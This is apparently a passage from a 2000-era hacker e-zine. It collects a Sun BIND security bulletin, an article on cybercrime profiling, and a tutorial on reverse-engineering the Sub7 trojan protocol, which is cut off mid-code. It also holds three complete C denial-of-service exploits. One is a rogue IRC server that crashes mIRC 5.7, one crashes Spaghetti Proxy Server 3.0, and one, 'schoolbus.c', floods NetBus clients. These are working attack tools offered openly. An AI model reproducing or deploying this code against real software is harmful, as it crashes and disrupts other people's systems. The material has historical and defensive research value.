4500 0045 0671 0000 3a11 26e5 tttt tttt
aaaa aaaa
140f 112f 0031 0dee
0001 0189
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 3a
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee
nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w
I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+
n9jE26XP5HU=
=yKsl
-----END PGP SIGNATURE-----
----- End of forwarded messages
[End of raw data]
@HWA
257.0 PSS: Sun bind advisory
~~~~~~~~~~~~~~~~~~~~~~
-----BEGIN PGP SIGNED MESSAGE-----
________________________________________________________________________________
Sun Microsystems, Inc. Security Bulletin
Bulletin Number: #00194
Date: March 29, 2000
Cross-Ref: CERT Advisory CA-99-14
Title: BIND
________________________________________________________________________________
The information contained in this Security Bulletin is provided "AS IS."
Sun makes no warranties of any kind whatsoever with respect to the information
contained in this Security Bulletin. ALL EXPRESS OR IMPLIED CONDITIONS,
REPRESENTATIONS AND WARRANTIES, INCLUDING ANY WARRANTY OF NON-INFRINGEMENT OR
IMPLIED WARRANTY OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, ARE
HEREBY DISCLAIMED AND EXCLUDED TO THE EXTENT ALLOWED BY APPLICABLE LAW.
IN NO EVENT WILL SUN MICROSYSTEMS, INC. BE LIABLE FOR ANY LOST REVENUE,
PROFIT OR DATA, OR FOR DIRECT, SPECIAL, INDIRECT, CONSEQUENTIAL, INCIDENTAL
OR PUNITIVE DAMAGES HOWEVER CAUSED AND REGARDLESS OF ANY THEORY OF LIABILITY
ARISING OUT OF THE USE OF OR INABILITY TO USE THE INFORMATION CONTAINED IN
THIS SECURITY BULLETIN, EVEN IF SUN MICROSYSTEMS, INC. HAS BEEN ADVISED OF
THE POSSIBILITY OF SUCH DAMAGES.
If any of the above provisions are held to be in violation of applicable law,
void, or unenforceable in any jurisdiction, then such provisions are waived
to the extent necessary for this disclaimer to be otherwise enforceable in
such jurisdiction.
________________________________________________________________________________
1. Bulletin Topics
Sun announces the release of patches for Solaris(tm) 7 which relate to
four vulnerabilities in BIND reported in CERT Advisory CA-99-14.
Sun recommends that you install the patches listed in section 4
immediately on systems running Solaris 7 with Sun's implementation
of BIND.
2. Who is Affected
Vulnerable: Solaris 7 running Sun's implementation of BIND
Not vulnerable: All other supported versions of Solaris.
3. Understanding the Vulnerabilities
The Berkeley Internet Name Domain (BIND) is an implementation of the
Domain Name System (DNS) protocols.
CERT Advisory CA-99-14 describes six vulnerabilities in certain versions
of BIND. Solaris 7 is vulnerable to the following four vulnerabilities
reported in the CERT advisory.
Vulnerability #3: the "so_linger bug"
Remote attackers may degrade the performance of named.
Vulnerability #4: the "fdmax bug"
Remote attackers may cause named to crash.
Vulnerability #5: the "maxdname bug"
Remote attackers may cause named to crash.
Vulnerability #6: the "naptr bug"
Remote attackers may cause named to crash.
The CERT advisory CA-99-14 is available at:
ftp://info.cert.org/pub/cert_advisories/CA-99-14-bind.txt
No other supported versions of Solaris (including Solaris 8) are
affected by any of the six vulnerabilities reported in the CERT
advisory.
4. List of Patches
The following patches are available in relation to the above problems.
Solaris version Patch ID
_______________ _________
Solaris 7 (SPARC) 107018-02
106938-03
Solaris 7 (Intel) 107019-02
106939-03
_______________________________________________________________________________
APPENDICES
A. Patches listed in this bulletin are available to all Sun customers at:
http://sunsolve.sun.com/securitypatch
B. Checksums for the patches listed in this bulletin are available at:
ftp://sunsolve.sun.com/pub/patches/CHECKSUMS
C. Sun security bulletins are available at:
http://sunsolve.sun.com/security
D. Sun Security Coordination Team's PGP key is available at:
http://sunsolve.sun.com/pgpkey.txt
E. To report or inquire about a security problem with Sun software, contact
one or more of the following:
- Your local Sun Solution Center
- Your representative computer security response team, such as CERT
- Sun Security Coordination Team. Send email to:
security-alert@sun.com
F. To receive information or subscribe to our CWS (Customer Warning System)
mailing list, send email to:
security-alert@sun.com
with a subject line (not body) containing one of the following commands:
Command Information Returned/Action Taken
_______ _________________________________
help An explanation of how to get information
key Sun Security Coordination Team's PGP key
list A list of current security topics
query [topic] The email is treated as an inquiry and is forwarded to
the Security Coordination Team
report [topic] The email is treated as a security report and is
forwarded to the Security Coordination Team. Please
encrypt sensitive mail using Sun Security Coordination
Team's PGP key
send topic A short status summary or bulletin. For example, to
retrieve a Security Bulletin #00138, supply the
following in the subject line (not body):
send #138
subscribe Sender is added to our mailing list. To subscribe,
supply the following in the subject line (not body):
subscribe cws your-email-address
Note that your-email-address should be substituted
by your email address.
unsubscribe Sender is removed from the CWS mailing list.
________________________________________________________________________________
Copyright 2000 Sun Microsystems, Inc. All rights reserved. Sun,
Sun Microsystems, Solaris and SunOS are trademarks or registered trademarks
of Sun Microsystems, Inc. in the United States and other countries. This
Security Bulletin may be reproduced and distributed, provided that this
Security Bulletin is not modified in any way and is attributed to
Sun Microsystems, Inc. and provided that such reproduction and distribution
is performed for non-commercial purposes.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
iQCVAwUBOOJQKrdzzzOFBFjJAQHbJAQAmcXk9+7E0mB5ybqEK9eKjbtqxEfkwcqF
sGMNYLMpcQEM67uWzPfZzn5BB+FMKfYJjF0cZlBOMgt7zVWakIZxq7NoW3Qu3XV6
GLjoe0gqNAyuDrDZBiHinPhnFh5Url4OK7T9+DTrorJry7KrmD5t+YRjEUN3Nqro
MDlDgR9fAu0=
=cDAV
-----END PGP SIGNATURE-----
@HWA
258.0 Cyberprofiling
~~~~~~~~~~~~~~
Source: http://www.infosecuritymag.com/
DIGITAL FORENSICS SIDEBAR � CYBERPROFILING
CyberCrime Watch Computers don't commit electronic breaches. People
do. BY TERRY M. GUDAITIS
Contrary to depictions in Hollywood movies, those responsible for the
majority of cyber- crimes, hacking incidents and cyberdeviant acts cannot
be "profiled" as a certain demographic type. Cyberstalkers and online
child pornographers do not look deviant; in fact, they are as diverse as
the employee population of any company. Con-sider, for example, two recent
perpetrators: the former head of Disney's Go Nework, Patrick Naughton, who
has been charged with trying to meet a 13-year-old girl he encountered in
an Internet chat room, allegedly with the intent to have sex with her; and
Harvard Divinity School's former dean, Ronald Thiemann, who was dismissed
for storing child pornography on his office PC.
Many infosecurity practitioners think about their work within a purely
technical context: firewalls, routers, switches, monitoring software and
so on. This is particularly the case when it comes to cyberforensics.
While it's clear that a technical approach to forensics is critical to
uncovering evidence from computer-based crimes, the tendency to focus on
technology alone comes at the expense of an equally important activity:
cybercrime profiling.
One aspect of infosec that is consistently overlooked, underestimated or
incorrectly defined is the human dimension. Humans are the catalysts
behind the keyboards and modems used to conduct computer crimes.
Consequently, anyone who has responsibility for systems security, incident
response teams, business continuity planning and IT hiring must understand
the implications of online behavior and computer use beyond purely
technical considerations. They must understand how to identify
cyberdeviant behavior, how to identify the perpetrators, how to protect
the innocent and how to reduce organizational vulnerability.
What Is Cyberprofiling? Profiling is the process by which a crime
scene is observed, evaluated and assessed from behavioral, psychological
and criminological perspectives in order to provide sociological insight
into the offending individual(s). The concept behind criminal profiling is
that weapons do not commit the crimes--people do. Put in a technical
context, computers don't hack--hackers do. The individuals who are
penetrating systems, launching distributed denial-of-service attacks and
defacing Web pages are the problem, not the advancing technologies and the
availability of hacking scripts on the Internet. Profiling provides the
necessary means to assess and understand the perpetrators of these
electronic crimes.
For decades, criminal or psychological profiling has been used by law
enforcement and the intelligence community to assess criminals, groups,
organizations, cultures and, most notably, serial killers. Analogously,
most hackers do not hack just once. They have a pattern, an MO and a
"signature." The use of criminal profiling in a technical setting is an
effective tool to narrow the suspect pool, provide insight into the
motivation of the perpetrator, possibly predict the hacker's next move
(which, in recent notable cases, involved attempted extortion) and,
ultimately, assist in the interview and interrogation process of an
identified perpetrator.
When assessing a conventional crime scene, investigators enlist the
assistance of relevant professionals, including demolitions experts,
medical examiners, fingerprint examiners, ballistics experts and
psychological profilers. Cyberprofiling involves a similar process, with
technical experts, systems ad-ministrators, Web programmers, Unix experts,
Windows gurus and antivirus specialists. The added tool of profiling
centers on the behavior of the perpetrator.
When used in conjunction with technical forensics tools, cyberprofiling
helps you� � Narrow the suspect pool o Identify single or multiple
perpetrators � Determine an organization's vulnerabilities � Predict
perpetrator behavior � Mitigate an incident � Supplement the interview or
interrogation process � Assist in the evidence collection and prosecution
� Provide suggestions and follow-up post-incident
Profiling Myths and Legends The depiction of criminal and
psychological profiling in movies and on TV often misrepresents what
profiling really is...and how a profile is generated. � Profiling is not
psychological testing; and psychological testing does not derive a
profile. � Profiling is not a static process; people are dynamic and
distinct, and the process of profiling must be dynamic and evolving. �
Profiling is not inductive. It is not studying data, creating a template
and applying that template to criminal incidents. � Profiling is conducted
on a case-by-case basis. The profile is derived deductively from that
case-specific data.
The most important thing to realize is that every case is distinct: There
is no one hacker profile!
In the never-ending battle against computer crime, companies have invested
substantial capital in advanced computer forensics tools and intrusion
detection technologies. At the same time, organizations have spent a great
deal of money educating employees combating hostile work environments,
discrimination and sexual harassment. For cyberforensics to be a complete
science, the same level of emphasis and funding must be devoted to the
"human side" of computer crime investigation.
TERRY M. GUDAITIS, Ph.D. (terry.gudaitis@cip.saic.com), is a criminal
profiler in the High-Tech Criminal Investigations unit of Global Integrity
Corp.
@HWA
259.0 mIRC 5.7 Exploit code
~~~~~~~~~~~~~~~~~~~~~
Use blind spoofing to crash the mIRC client by sending malformed
server messages.
/*
diemirc.c - mIRC 5.7 denial of service exploits.
(c) Chopsui-cide/MmM '00
The Mad Midget Mafia - http://midgets.box.sk/
Disclaimer: this program is proof of concept code, and
is not intended to be used maliciously. By using this
code, you take all responsibility for any damage incurred
by the use of it.
This program listens on port 6667 for incoming connections,
then crashes mIRC using the exploit you choose.
*/
#include <winsock.h>
#include <stdio.h>
#define LISTEN_PORT 6667
#define TARGET_NICK "Chopsui-cide"
void listen_sock(int sock, int port);
void die(char *message);
int poll_for_connect(int listensock);
int select_sploit();
void exploit1(int s);
void exploit2(int s);
void exploit3(int s);
void exploit4(int s);
main()
{
int ls;
int c;
WSADATA wsaData;
WORD wVersionRequested;
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) die("Unable to initialise Winsock.");
if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) die("Unable to create socket.");
c = select_sploit();
listen_sock(ls, LISTEN_PORT);
printf("Waiting for connection on port %d...\n", LISTEN_PORT);
ls = poll_for_connect(ls);
switch (c)
{
case 0 :
exploit1(ls);
break;
case 1 :
exploit2(ls);
break;
case 2 :
exploit3(ls);
break;
case 3 :
exploit4(ls);
}
closesocket(ls);
return 0;
}
void listen_sock(int sock, int port)
{
struct sockaddr_in addr;
int c = 0;
memset((char *)&addr,'0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = INADDR_ANY;
addr.sin_port = htons(port);
if (bind(sock, &addr, sizeof(addr)) == -1) die("Error binding socket.");
if (listen(sock, 20) == -1) die("Error listening.");
}
void die(char *message)
{
printf("Fatal error: %s\n", message);
exit(1);
}
int poll_for_connect(int listensock)
{
struct sockaddr_in peer;
int sendsock;
int szpeer = sizeof(peer);
do
{
sendsock = accept(listensock, (struct sockaddr *) &peer, &szpeer);
} while(sendsock == -1);
printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr));
return sendsock;
}
#define last_select 3
int select_sploit()
{
char k;
printf("Select exploit:\n0 - incomplete nick change.\n");
printf("1 - msg with loads of parameters.\n2 - incomplete mode change.\n");
printf("3 - incomplete kick.\n");
k = getch();
if (atoi((char *)&k) > last_select)
{
printf("Invalid selection.\n");
exit(1);
}
if (((int)k < 0x30) || ((int)k > 0x39))
{
printf("Invalid selection.\n");
exit(1);
}
return atoi((char *)&k);
}
/*
Exploit 1: incomplete nick change
mIRC 5.7 and past versions seem to suffer from bugs
involving incomplete messages. I previously e-mailed
Khaled M. Bey about one such bug, and it's fixed in
this version, but there are other similiar (almost
identical) bugs still in v5.7.
This attack is executed from the _server_ side.
All we need to do is send the client a half complete
nick change message, ie
":<targetnick>!ident@host.com NICK"
We must put the target's current nick name where
<targetnick> is.
*/
#define END "!ident@host.com NICK\x0a"
void exploit1(int s)
{
char sod[256];
memset((char *)&sod, '\0', 256);
sod[0] = ':';
strcat(sod, TARGET_NICK);
strcat(sod, END);
send(s, sod, 256, 0);
Sleep(1000); // Make sure the packet gets there.
}
/*
Exploit 2: server message overflow
If the client sends a large message with to many
parameters, it crashes, and part of the buffer is
stuffed into EAX.
*/
#define MSG_LEN 1000 // This must be an even number.
void exploit2(int s)
{
char sod[MSG_LEN];
int c = 0;
do
{
sod[c] = 0xff;
sod[c + 1] = ' ';
c += 2;
} while(c < MSG_LEN);
send(s, sod, MSG_LEN, 0);
Sleep(1000); // Make sure the packet gets there.
}
/*
Exploit 3: incomplete mode change
This is basically the same as the nick change
exploit.
*/
#define END "!ident@host.com MODE\x0a"
void exploit3(int s)
{
char sod[256];
memset((char *)&sod, '\0', 256);
sod[0] = ':';
strcat(sod, TARGET_NICK);
strcat(sod, END);
send(s, sod, 256, 0);
Sleep(1000); // Make sure the packet gets there.
}
/*
Exploit 4: incomplete kick
Another incomplete message bug.
*/
#define JOIN " JOIN #\x0a"
#define KICK ": KICK #\x0a"
void exploit4(int s)
{
char sod[256];
memset((char *)&sod, '\0', 256);
sod[0] = ':';
strcat(sod, TARGET_NICK);
strcat(sod, JOIN);
printf("%s%s", sod, KICK);
send(s, sod, strlen(sod), 0);
send(s, KICK, strlen(KICK), 0);
Sleep(1000); // Make sure the packet gets there.
}
@HWA
260.0 Spaghetti proxy server exploit code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
sps3.c - Spaghetti Proxy Server 3.0 DoS attack
(c) Chopsui-cide/MmM '00
The Mad Midget Mafia - http://midgets.box.sk/
Spaghetti Proxy Server claims to offer "complete security". In
reality, it does the exact opposite. As well as being vulnerable
to a rather simple bug, it stores your RAS username and password in
plaintext in the registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASPassword
and
HKEY_LOCAL_MACHINE\SOFTWARE\aVirt\Gateway Home\3.0\RAS\RASUserName
This simple program will cause SPS to crash. It does not appear as
though arbitrary code could be execute using this vulnerability.
Usage: sps3 <host>
*/
#include <winsock.h>
#include <stdio.h>
#define PORT 38126
#define LEN 33
void fatal_error(char *message);
int connect_sock(int sock, char *host, int port);
int create_sock();
main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
int sock;
char str[LEN];
if (argc < 2)
{
printf("Usage: sps3 <host>\n");
exit(0);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) fatal_error("Unable to initialise Winsock.");
if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) fatal_error("Unable to create socket.");
connect_sock(sock, argv[1], PORT);
memset(str, 'X', LEN);
send(sock, str, LEN, 0);
Sleep(5000); // This may obviously have to be increased.
closesocket(sock);
printf("Done\n");
}
int connect_sock(int sock, char *host, int port)
{
struct sockaddr_in addr;
struct hostent *he;
memset(&addr, '0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(host);
addr.sin_port = htons(port);
if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host.");
if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) fatal_error("Error connecting.");
printf("Connected to %s:%d\n", host, port);
return 0;
}
void fatal_error(char *message)
{
printf("Fatal error: %s\n", message);
exit(1);
}
@HWA
261.0 schoolbus.c - netbus 1.7 client exploit crashes script kids box
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
schoolbus.c - Remote DoS exploit for NetBus 1.7 client
(c) -Chopsui-cide/[M-m-M]- 1999
The Mad Midget Mafia [M-m-M] - http://underground2.4mg.com/
A nice anti-lamer device - freezes NetBus 1.7, sometimes taking the
rest of the system with it (on slow systems).
*/
#include <winsock.h>
#include <conio.h>
#include <io.h>
#include <stdio.h>
#define CRASHLEN 80000
char *ver = {"NetBus 1.7"};
char *message = {"Message; Uh oh! You've been screwed, you talentless script kiddie."};
char cr[] = {0,13};
void listen_sock(int sock, int port); // Starts the socket listening
void die(char *message); // Fatal error
int poll_for_connect(int listensock); // Wait for connect
void bye_bye_script_kiddie(int sock); // Sends the crash :)
main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
int listensock;
int sendsock;
int c = 0;
if (argc < 2)
{
puts("Usage: schoolbus <listenport>");
exit(0);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) die("Unable to initialise Winsock.");
if ((listensock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) die("Unable to create socket.");
if ((sendsock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) die("Unable to create socket.");
listen_sock(listensock, atoi(argv[1]));
do
{
puts("Listening...");
sendsock = poll_for_connect(listensock);
bye_bye_script_kiddie(sendsock);
closesocket(sendsock);
} while(!kbhit());
getch();
closesocket(listensock);
return 0;
}
void listen_sock(int sock, int port)
{
struct sockaddr_in addr;
int c = 0;
memset((char *)&addr,'0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = INADDR_ANY;
addr.sin_port = htons(port);
if (bind(sock, &addr, sizeof(addr)) == -1) die("Error binding socket.");
if (listen(sock, 20) == -1) die("Error listening.");
}
void die(char *message)
{
printf("Fatal error: %s\n", message);
exit(1);
}
int poll_for_connect(int listensock)
{
struct sockaddr_in peer;
int sendsock;
int szpeer = sizeof(peer);
do
{
sendsock = accept(listensock, (struct sockaddr *) &peer, &szpeer);
} while(sendsock == -1);
printf("Connection from [%s].\n", inet_ntoa(peer.sin_addr));
return sendsock;
}
void bye_bye_script_kiddie(int sock)
{
int d = 0;
char tmp[CRASHLEN];
puts("Crashing...");
do
{
tmp[d] = 'X';
d++;
} while(d < CRASHLEN);
if (send(sock, ver, strlen(ver), 0) == -1) die("Send error.");
if (send(sock, cr, 2, 0) == -1) die("Send error.");
if (send(sock, message, strlen(message), 0) == -1) die("Send error."); // Send our bye bye
// message.
if (send(sock, cr, 2, 0) == -1) die("Send error.");
Sleep(1000); // Wait a second so they see the message, then....
if (send(sock, "Message; ", 9, 0) == -1) die("Send error."); // Teach them a lesson :)
if (send(sock, tmp, CRASHLEN, 0) == -1) die("Send error.");
if (send(sock, cr, 2, 0) == -1) die("Send error.");
Sleep(3000); // Make sure all the data got sent (may need adjustment).
printf("Send complete: another one bites the dust!\n\n");
}
@HWA
262.0 Protocol reverse engineering using Sub7 as an example
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reverse engineering protocols by example
Chopsui-cide[MmM] 2000
The Mad Midget Mafia - http://midgets.box.sk/
E-mail: chopsuicide@mail.box.sk
=============================================================================
Introduction:
===============
The skills tought in this text can be used for a variety of purposes such as
open sourcing programs and documenting protocols. It is a newbie text, so
don't expect anything too exciting. As our example, we will examine _some_
of the SubSeven protocol, and write some code to implement some of it (in C).
It should be noted that this was written on and for Windows, but should be
applicable to the Unix environment as well (to some degree).
Examinining the protocol
==========================
Throughout this tutorial, we will examine the SubSeven 2.1 Gold protocol.
First, we will need to obtain a dump of some of the protocol. For this we
will use the following C source:
//------------------------------- *snip* -------------------------------
// dumpprot.c
#include <winsock.h>
#include <stdio.h>
// This program acts like a proxy. It dumps all traffic to stdout.
#define LOOP_BACK "127.0.0.1"
#define LIS_PORT 2000
#define CON_PORT 27374
#define MAX_PACKET_SIZE 2048
void fatal_error(char *msg);
void bnd_n_lsn(int sock, int port);
int connect_sock(int sock, char *host, int port);
void server_side_thread(void *param);
void client_side_thread(void *param);
int ss, cs, ls; // Server socket, client socket, listen socket.
void main()
{
WSADATA data;
WORD ver;
WORD thid;
HANDLE h;
struct sockaddr_in peer;
int szpeer;
ver = MAKEWORD(1, 1);
if (WSAStartup(ver, &data) < 0) fatal_error("Unable to initialise Winsock.");
if ((ss = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
if ((cs = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
// Wait for connect from client.
printf("Waiting for connection...");
bnd_n_lsn(ls, LIS_PORT);
szpeer = sizeof(peer);
do
{
cs = accept(ls, (struct sockaddr *)&peer, &szpeer);
} while(cs == -1);
printf("accepted from [%s].\n", inet_ntoa(peer.sin_addr));
closesocket(ls); // We won't be needing this...
// Now, connect the server socket.
printf("Connecting to [%s]...", LOOP_BACK);
connect_sock(ss, LOOP_BACK, CON_PORT);
// We can now begin relaying.
printf("\nLinked: [%s]<->[%s]\n", inet_ntoa(peer.sin_addr), LOOP_BACK);
// Start threads and wait for a key to be pressed.
h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)client_side_thread, (LPVOID)0, 0, (LPDWORD)&thid);
SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)server_side_thread, (LPVOID)0, 0, (LPDWORD)&thid);
SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
getch();
// Clean up a bit.
closesocket(ss);
closesocket(cs);
return; // Exit
}
void fatal_error(char *msg)
{
printf("Fatal error: %s\n", msg);
exit(1);
}
void bnd_n_lsn(int sock, int port) // Bind and list socket
{
struct sockaddr_in addr;
int c = 0;
memset((char *)&addr,'0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = INADDR_ANY;
addr.sin_port = htons(port);
if (bind(sock, &addr, sizeof(addr)) == -1) fatal_error("Error binding socket.");
if (listen(sock, 20) == -1) fatal_error("Error listening.");
}
int connect_sock(int sock, char *host, int port)
{
struct sockaddr_in addr;
struct hostent *he;
memset(&addr, '0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(host);
addr.sin_port = htons(port);
if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host.");
if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) return -1;
return 0;
}
void server_side_thread(void *param)
{
char buf[MAX_PACKET_SIZE];
int r;
do
{
memset((char *)&buf, 0, MAX_PACKET_SIZE);
r = recv(ss, (char *)&buf, MAX_PACKET_SIZE, 0);
if (r > 0)
{
printf("Server: [%s]\n", buf);
send(cs, (char *)&buf, r, 0); // Forward to client socket
}
} while(r != -1);
printf("Server socket died.\n");
exit(0);
}
void client_side_thread(void *param)
{
char buf[MAX_PACKET_SIZE];
int r;
do
{
memset((char *)&buf, 0, MAX_PACKET_SIZE);
r = recv(cs, (char *)&buf, MAX_PACKET_SIZE, 0);
if (r > 0)
{
printf("Client: [%s]\n", buf);
send(ss, (char *)&buf, r, 0); // Forward to server socket
}
} while(r != -1);
printf("Client socket died.\n");
exit(0);
}
//------------------------------- *snip* -------------------------------
Configure your Sub7 server to listen to port 27374, and set the password to
"hello". Run it. For gods sake make sure you are either NOT connected to any
IP networks, or configure your firewall to block any traffic to port 27374
from anything but your system's loop-back address. Compile and run
dumpprot.c. Connect to port 2000 with the Sub7 client. Now, do the following,
and _only_ the following (your dump of the protocol should be the same as the
one shown here).
1) Enter the password ("hello").
2) Select "keys/messages".
3) Click on "msg manager".
4) Select "Warning" as the icon.
5) Select "Yes, no, cancel" as the buttons.
6) Enter "title" as the message title.
7) Enter "text" as the message text.
8) Click on "send message".
9) Respond by clicking on "yes".
10) Repeat steps 8 and 9, but this time select "no".
11) Change the icon to "error".
12) Send the message (select "yes").
13) Change the button to "OK".
14) Send the message.
15) Exit dumpprot.
Your results should look like this:
[snip]
Waiting for connection...accepted from [127.0.0.1].
Connecting to [127.0.0.1]...
Linked: [127.0.0.1]<->[127.0.0.1]
Server: [PWD]
Client: [PWDhello]
Server: [connected. 19:54.08 - April 5, 2000, Wednesday, version: GOLD 2.1]
Client: [MW:51titleZJXXtext]
Server: [user clicked : Yes.]
Client: [MW:51titleZJXXtext]
Server: [user clicked : No.]
Client: [MW:53titleZJXXtext]
Server: [user clicked : Yes.]
Client: [MW:03titleZJXXtext]
Server: [user clicked : Ok.]
[snip]
Let's break this down a little:
[snip]
Server: [PWD] // This is obviously the server telling the client that it
can't connect until the correct password is sent. //
Client: [PWDhello] // Here, the client sends back the correct password. //
Server: [connected. 19:54.08 - April 5, 2000, Wednesday, version: GOLD 2.1]
// The client now knows that it has connected, and the server is ready to
accept commands. //
// This next part will need to be looked at carefully. Pay attention to the
two characters after the colon in each client request:
Client: [MW:51titleZJXXtext] // "Yes, No, Cancel" button, "warning" icon. //
Server: [user clicked : Yes.] // Self explanatory. This is shoved straight
into the status bar at the bottom of the client window //
Client: [MW:51titleZJXXtext] // "Yes, No, Cancel" button, "warning" icon. //
Server: [user clicked : No.]
Client: [MW:53titleZJXXtext] // "Yes, No, Cancel" button, "error" icon. The 1
has changed to the three. Let's not make assumptions yet... //
Server: [user clicked : Yes.]
Client: [MW:03titleZJXXtext] // "OK" button, "error" icon. The 5 has changed
to 0. It's fairly safe to assume that the first character represents which
button combo, and the second the icon. //
Server: [user clicked : Ok.] // Surprise, surprise. //
[snip]
Now we'll break down the structure of all messages a bit more. Make sure you
save the dump of the protocol somewhere for later (you might need it). From
what we have seen thus far most of this protocol uses regular alphanumeric
characters. To see if there are any terminating characters to divide messages
we will need to obtain a hex dump of a few messages. Here's the modified
version of dumpprot.c that will do what we want (keep the old one):
//------------------------------- *snip* -------------------------------
// dumphex.c
#include <winsock.h>
#include <stdio.h>
// This program acts like a proxy. It dumps all traffic to stdout.
#define LOOP_BACK "127.0.0.1"
#define LIS_PORT 2000
#define CON_PORT 27374
#define MAX_PACKET_SIZE 2048
void fatal_error(char *msg);
void bnd_n_lsn(int sock, int port);
int connect_sock(int sock, char *host, int port);
void server_side_thread(void *param);
void client_side_thread(void *param);
int ss, cs, ls; // Server socket, client socket, listen socket.
void main()
{
WSADATA data;
WORD ver;
WORD thid;
HANDLE h;
struct sockaddr_in peer;
int szpeer;
ver = MAKEWORD(1, 1);
if (WSAStartup(ver, &data) < 0) fatal_error("Unable to initialise Winsock.");
if ((ss = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
if ((cs = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
if ((ls = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) fatal_error("Could not create socket.");
// Wait for connect from client.
printf("Waiting for connection...");
bnd_n_lsn(ls, LIS_PORT);
szpeer = sizeof(peer);
do
{
cs = accept(ls, (struct sockaddr *)&peer, &szpeer);
} while(cs == -1);
printf("accepted from [%s].\n", inet_ntoa(peer.sin_addr));
closesocket(ls); // We won't be needing this...
// Now, connect the server socket.
printf("Connecting to [%s]...", LOOP_BACK);
connect_sock(ss, LOOP_BACK, CON_PORT);
// We can now begin relaying.
printf("\nLinked: [%s]<->[%s]\n", inet_ntoa(peer.sin_addr), LOOP_BACK);
// Start threads and wait for a key to be pressed.
h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)client_side_thread, (LPVOID)0, 0, (LPDWORD)&thid);
SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
h = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)server_side_thread, (LPVOID)0, 0, (LPDWORD)&thid);
SetThreadPriority(h, THREAD_PRIORITY_BELOW_NORMAL);
getch();
// Clean up a bit.
closesocket(ss);
closesocket(cs);
return; // Exit
}
void fatal_error(char *msg)
{
printf("Fatal error: %s\n", msg);
exit(1);
}
void bnd_n_lsn(int sock, int port) // Bind and list socket
{
struct sockaddr_in addr;
int c = 0;
memset((char *)&addr,'0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = INADDR_ANY;
addr.sin_port = htons(port);
if (bind(sock, &addr, sizeof(addr)) == -1) fatal_error("Error binding socket.");
if (listen(sock, 20) == -1) fatal_error("Error listening.");
}
int connect_sock(int sock, char *host, int port)
{
struct sockaddr_in addr;
struct hostent *he;
memset(&addr, '0', sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(host);
addr.sin_port = htons(port);
if ((he = gethostbyname(host)) != NULL) memcpy((char *)&addr.sin_addr, he->h_addr, he->h_length);
else if ((addr.sin_addr.s_addr = inet_addr(host)) == -1) fatal_error("Invalid host.");
if (connect(sock, (struct sockaddr_in *)&addr, 16) == -1) return -1;
return 0;
}
void server_side_thread(void *param)
{
char buf[MAX_PACKET_SIZE];
int r, c;
do
{
memset((char *)&buf, 0, MAX_PACKET_SIZE);
r = recv(ss, (char *)&buf, MAX_PACKET_SIZE, 0);
if (r > 0)
{
c = 0;
printf("Server: [");
do
{
printf("%x ", buf[c]);
c++;
} while(c < r);
printf("]\n", buf);
send(cs, (char *)&buf, r, 0); // Forward to server socket
}
